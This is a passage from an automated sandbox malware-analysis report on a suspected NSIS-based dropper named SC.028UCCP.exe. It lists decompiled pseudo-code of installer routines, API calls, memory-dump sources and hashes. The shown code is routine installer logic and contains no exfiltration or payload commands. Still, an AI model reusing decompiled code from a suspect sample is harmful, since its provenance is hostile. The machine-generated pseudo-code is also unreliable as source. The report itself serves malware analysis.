                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030F5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 0040564B
                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030F5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405654
                                  • lstrcatA.KERNEL32(?,00409014), ref: 00405665
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405645
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrcatlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 2659869361-3916508600
                                  • Opcode ID: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                  • Instruction ID: 2c4aba1e68f569edc0bbdca96b08fce85388150d4565a43965472bde34b66e99
                                  • Opcode Fuzzy Hash: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                  • Instruction Fuzzy Hash: 68D0A9626069306AE60223258C05E8B3A2CDF12312B080062F200B62A2C6BC6E418BFE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00401EDC(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E00402A07(0xffffffee);
				 *(_t30 - 0x30) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x2c);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409014, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405AF6(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405AF6(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                  0x00401ede
                                  0x00401ee6
                                  0x00401eeb
                                  0x00401ef0
                                  0x00401ef4
                                  0x00401ef7
                                  0x00401ef9
                                  0x00401f00
                                  0x00401f09
                                  0x00401f11
                                  0x00401f14
                                  0x00401f29
                                  0x00401f2f
                                  0x00401f42
                                  0x00401f4b
                                  0x00401f57
                                  0x00401f5c
                                  0x00401f5c
                                  0x00401f42
                                  0x00401f5f
                                  0x00401b80
                                  0x00401b80
                                  0x00401f14
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                  • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                  • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                  • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                    • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                  • String ID:
                                  • API String ID: 1404258612-0
                                  • Opcode ID: 5fa3f7e2f08ffcf118387348be9774dcedb8fcc8d1b5daa33384469267891b36
                                  • Instruction ID: f900153287ab474cfde03a6598713ff26eba214e440f244ace580773df7c575c
                                  • Opcode Fuzzy Hash: 5fa3f7e2f08ffcf118387348be9774dcedb8fcc8d1b5daa33384469267891b36
                                  • Instruction Fuzzy Hash: 7D114C71A00108BEDB01EFA5DD81DAEBBB9EF04344B20407AF505F61A2D7789A54DB28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004056DE Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004056DE(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405670(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}









                                  0x004056e7
                                  0x004056ee
                                  0x004056f1
                                  0x004056f3
                                  0x004056f7
                                  0x0040570c
                                  0x0040572b
                                  0x00000000
                                  0x00405713
                                  0x00405715
                                  0x00405716
                                  0x00405719
                                  0x0040571a
                                  0x00405722
                                  0x00000000
                                  0x00000000
                                  0x00405724
                                  0x00405727
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405727
                                  0x00000000
                                  0x00405716
                                  0x00405704
                                  0x00000000
                                  0x00405705

                                  APIs
                                  • CharNextA.USER32(?,?,Resolver.Sel,?,0040574A,Resolver.Sel,Resolver.Sel,?,?,74D0FA90,00405495,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 004056EC
                                  • CharNextA.USER32(00000000), ref: 004056F1
                                  • CharNextA.USER32(00000000), ref: 00405705
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CharNext
                                  • String ID: Resolver.Sel
                                  • API String ID: 3213498283-3053244350
                                  • Opcode ID: 594f31a488926a8360d4dc687cc681d5945629fa4112d744ade59810bb8e8aa4
                                  • Instruction ID: e3580abeef22c051b0f2771d67a3f552fa31247d9b875f7e27f1ca38f70f0df6
                                  • Opcode Fuzzy Hash: 594f31a488926a8360d4dc687cc681d5945629fa4112d744ade59810bb8e8aa4
                                  • Instruction Fuzzy Hash: A7F0F661D04F60EAFB32A6641C54F775BC8CB55390F04547BE640772C2C27C48416FAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402BCF Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00402BCF(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420bd0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42ebac;
						if(_t2 >  *0x42ebac) {
							_t3 = CreateDialogParamA( *0x42eba0, 0x6f, 0, E00402B4C, 0);
							 *0x420bd0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405EFC(0);
					}
				} else {
					_t6 =  *0x420bd0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420bd0 = 0;
					return _t6;
				}
			}






                                  0x00402bd6
                                  0x00402bf0
                                  0x00402bf6
                                  0x00402c00
                                  0x00402c06
                                  0x00402c0c
                                  0x00402c1d
                                  0x00402c26
                                  0x00000000
                                  0x00402c2b
                                  0x00402c32
                                  0x00402bf8
                                  0x00402bff
                                  0x00402bff
                                  0x00402bd8
                                  0x00402bd8
                                  0x00402bdf
                                  0x00402be2
                                  0x00402be2
                                  0x00402be8
                                  0x00402bef
                                  0x00402bef

                                  APIs
                                  • DestroyWindow.USER32(00000000,00000000,00402DAF,00000001), ref: 00402BE2
                                  • GetTickCount.KERNEL32 ref: 00402C00
                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B4C,00000000), ref: 00402C1D
                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C2B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                  • String ID:
                                  • API String ID: 2102729457-0
                                  • Opcode ID: 221c7a22a5a9227ee69f780c9984a6d0d8c9694b7f6172ee8b1a65897613c2d2
                                  • Instruction ID: 54a0d07438df805a889332e5fe20a84f483a1b8d84b4f98cf8bddfbad8bd3af6
                                  • Opcode Fuzzy Hash: 221c7a22a5a9227ee69f780c9984a6d0d8c9694b7f6172ee8b1a65897613c2d2
                                  • Instruction Fuzzy Hash: 13F03A30A09220ABC670AF54BE5CA8FBFA4B704B12F504876F105F11F5C778A8829B9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405733 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00405733(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405B98(0x42b428, _a4);
				_t21 = E004056DE(0x42b428);
				if(_t21 != 0) {
					E00405E03(_t21);
					if(( *0x42ebb8 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42b428;
						while(1) {
							_t11 = lstrlenA(0x42b428);
							_push(0x42b428);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405E9C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E0040568C(0x42b428);
								continue;
							} else {
								goto L1;
							}
						}
						E00405645();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                  0x0040573f
                                  0x0040574a
                                  0x0040574e
                                  0x00405755
                                  0x00405761
                                  0x0040576d
                                  0x0040576d
                                  0x00405785
                                  0x00405786
                                  0x0040578d
                                  0x0040578e
                                  0x00000000
                                  0x00000000
                                  0x00405771
                                  0x00405778
                                  0x00405780
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405778
                                  0x00405790
                                  0x00000000
                                  0x004057a4
                                  0x00405763
                                  0x00405767
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405767
                                  0x00405750
                                  0x00000000

                                  APIs
                                    • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,0040317B,Bilsynssteder Setup,NSIS Error), ref: 00405BA5
                                    • Part of subcall function 004056DE: CharNextA.USER32(?,?,Resolver.Sel,?,0040574A,Resolver.Sel,Resolver.Sel,?,?,74D0FA90,00405495,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 004056EC
                                    • Part of subcall function 004056DE: CharNextA.USER32(00000000), ref: 004056F1
                                    • Part of subcall function 004056DE: CharNextA.USER32(00000000), ref: 00405705
                                  • lstrlenA.KERNEL32(Resolver.Sel,00000000,Resolver.Sel,Resolver.Sel,?,?,74D0FA90,00405495,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 00405786
                                  • GetFileAttributesA.KERNEL32(Resolver.Sel,Resolver.Sel,Resolver.Sel,Resolver.Sel,Resolver.Sel,Resolver.Sel,00000000,Resolver.Sel,Resolver.Sel,?,?,74D0FA90,00405495,?,C:\Users\user\AppData\Local\Temp\,74D0FA90), ref: 00405796
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                  • String ID: Resolver.Sel
                                  • API String ID: 3248276644-3053244350
                                  • Opcode ID: 3c9dc14865188e6dd6017da277a8703e65f48fa5295a43c451b6a9c127b8bf1e
                                  • Instruction ID: 46d2e0665c70af9664fe3e2e68506d2637a0e9b19dc503987d8b7146b8cfa3eb
                                  • Opcode Fuzzy Hash: 3c9dc14865188e6dd6017da277a8703e65f48fa5295a43c451b6a9c127b8bf1e
                                  • Instruction Fuzzy Hash: 45F02825104D5056C62233361C09BAF1B48CE82324F580A3BFC94B32D2DB3C9943EDBE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004024CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004024CF(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A07(0x11));
				} else {
					E004029EA(1);
					 *0x409fc0 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsuD883.tmp\System.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                  0x004024cf
                                  0x004024cf
                                  0x004024d2
                                  0x004024ed
                                  0x004024d4
                                  0x004024d6
                                  0x004024db
                                  0x004024e2
                                  0x004024f4
                                  0x0040266d
                                  0x0040266d
                                  0x004024fa
                                  0x0040250c
                                  0x004015a6
                                  0x004015a8
                                  0x00000000
                                  0x004015ae
                                  0x004015a8
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                  • lstrlenA.KERNEL32(00000000,00000011), ref: 004024ED
                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250C
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dll, xrefs: 004024DB, 00402500
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FileWritelstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dll
                                  • API String ID: 427699356-988332474
                                  • Opcode ID: 96c6132e3d91ff2b758554fec05a04a2741e40ae030c0935faf74290bda10c6f
                                  • Instruction ID: 4ea93a9a16b3ba26abbe76c2db383f10a173eb7eb3d60b9d4cac17740c2ddad1
                                  • Opcode Fuzzy Hash: 96c6132e3d91ff2b758554fec05a04a2741e40ae030c0935faf74290bda10c6f
                                  • Instruction Fuzzy Hash: 5CF08972A54141AFDB10EBA59E49EAF7668DB00304F14843BF141F51C2DAFCA941D76D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004035AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004035AE() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x428fe4; // 0x5bf4a8
				_t3 = E00403593(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x428fe4 =  *0x428fe4 & 0x00000000;
				return _t3;
			}







                                  0x004035af
                                  0x004035b7
                                  0x004035be
                                  0x004035c1
                                  0x004035c1
                                  0x004035c3
                                  0x004035c8
                                  0x004035cf
                                  0x004035d5
                                  0x004035d9
                                  0x004035da
                                  0x004035e2

                                  APIs
                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74D0FA90,00403586,004033CA,?), ref: 004035C8
                                  • GlobalFree.KERNEL32 ref: 004035CF
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004035C0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Free$GlobalLibrary
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 1100898210-3916508600
                                  • Opcode ID: f48b00596e4d9d111706c75d093eea229154fff81c11795a1c61bb8d9c13a4ed
                                  • Instruction ID: 7a8d405bc8bd7fec033f8d43938e5e29d5ac8ab2bcc25f37624c4f675abd0e47
                                  • Opcode Fuzzy Hash: f48b00596e4d9d111706c75d093eea229154fff81c11795a1c61bb8d9c13a4ed
                                  • Instruction Fuzzy Hash: 02E08C32912420ABC6225F44EE04B5A7BA86B5CB22F06002BE8407B2A08B746D428AC8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040568C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040568C(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                  0x0040568d
                                  0x00405697
                                  0x00405699
                                  0x004056a0
                                  0x004056a8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004056a8
                                  0x004056aa
                                  0x004056af

                                  APIs
                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SC.028UCCP.exe,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 00405692
                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SC.028UCCP.exe,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 004056A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrlen
                                  • String ID: C:\Users\user\Desktop
                                  • API String ID: 2709904686-1669384263
                                  • Opcode ID: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                  • Instruction ID: 7c4e54bae153d6ca8f15abcb2bf58ef5fe37b9cdc0349e7599eda1ff56861401
                                  • Opcode Fuzzy Hash: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                  • Instruction Fuzzy Hash: FBD0A7A240DD701EF30363108C04B8F7A4CDF12302F090462E041E6194C27C5C418BAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E100010E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001573, _t52);
				_t43 =  *0x1000405c +  *0x1000405c * 4 << 2;
				_t17 = E1000123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E10001278(E100012BF( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E100012E8( *_t55 - 0x30, E1000123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x10004030;
								 *0x10004030 = _t31;
								E10001525(_t31 + 4,  *0x10004064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x10004030;
							if( *0x10004030 != 0) {
								E10001525( *0x10004064, _t34 + 4, _t43);
								_t37 =  *0x10004030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x10004030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                  0x100010e7
                                  0x100010ef
                                  0x10001103
                                  0x1000110b
                                  0x10001116
                                  0x10001119
                                  0x10001121
                                  0x10001124
                                  0x10001126
                                  0x100011c4
                                  0x100011d0
                                  0x1000112c
                                  0x1000112d
                                  0x1000112d
                                  0x10001130
                                  0x10001131
                                  0x10001134
                                  0x10001203
                                  0x10001206
                                  0x1000119e
                                  0x100011a4
                                  0x100011ac
                                  0x100011b1
                                  0x100011b4
                                  0x00000000
                                  0x100011b4
                                  0x10001209
                                  0x1000120a
                                  0x10001186
                                  0x1000118c
                                  0x10001194
                                  0x00000000
                                  0x10001194
                                  0x10001152
                                  0x10001153
                                  0x1000115b
                                  0x10001168
                                  0x10001170
                                  0x10001179
                                  0x1000117e
                                  0x1000117e
                                  0x00000000
                                  0x10001153
                                  0x1000113a
                                  0x100011d1
                                  0x100011d1
                                  0x100011d8
                                  0x100011e5
                                  0x100011ea
                                  0x100011ef
                                  0x100011f5
